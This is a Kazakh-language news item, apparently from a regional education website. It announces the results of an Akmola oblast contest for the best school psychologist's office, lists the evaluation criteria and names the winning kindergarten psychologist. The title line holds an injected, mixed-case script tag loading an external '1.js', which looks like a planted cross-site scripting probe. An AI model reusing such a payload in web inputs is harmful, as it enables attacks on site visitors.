«Үздік психолог кабинеті»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.02.2020

31 қаңтар – 13 ақпан күндері аралығында Ақмола облысының білім беру ұйымдары арасында «Үздік психолог кабинеті» облыстық байқауы өтті.

Байқаудың бағдарламасына кіреді:

1.Кабинеттің негізгі функционалдық аймақтарын, жабдықтарды, жұмыс аймақтарын, техникалық құралдарды және интерьер дизайнының қосымша элементтерін орналастыру ерекшеліктерін бағалау;

2. Психологиялық жұмыстың барлық бағыттарын тиімді іске асыру үшін кабинеттің жабдықтармен және материалдармен қамтамасыз етілуін бағалау;

3. Кабинеттің әдістемелік жабдықталуын бағалау (осы мекеме жұмысының ерекшеліктеріне және психологиялық жұмыстың мәлімделген мақсаттарына сәйкес балалармен жұмыс кезінде пайдаланылатын диагностикалық және түзету-дамыту бағдарламалары мен әдістемелерінің болуы );

4. Педагог-психолог жұмысында кабинеттің қолда бар ресурстарын пайдалану тиімділігін бағалау;

5. Кабинетті безендіруде және пайдалануда шығармашылық көзқарас және кәсіби ұстаным.

6. Құжаттаманы талдау

«Мектепке дейінгі білім беру кабинеті» санатына 10 мектепке дейінгі ұйым қатысты.

Байқау қорытындысы бойынша Атбасар ауданының № 5 "Алтын бесік" бөбекжай-бақшасына, педагог-психолог А. Ш. Раисова 1 орын берілді.

Құттықтаймыз!

 

Просмотров: 606


Пікір қосу



Деректерді қолтаңбаға қосу
Текст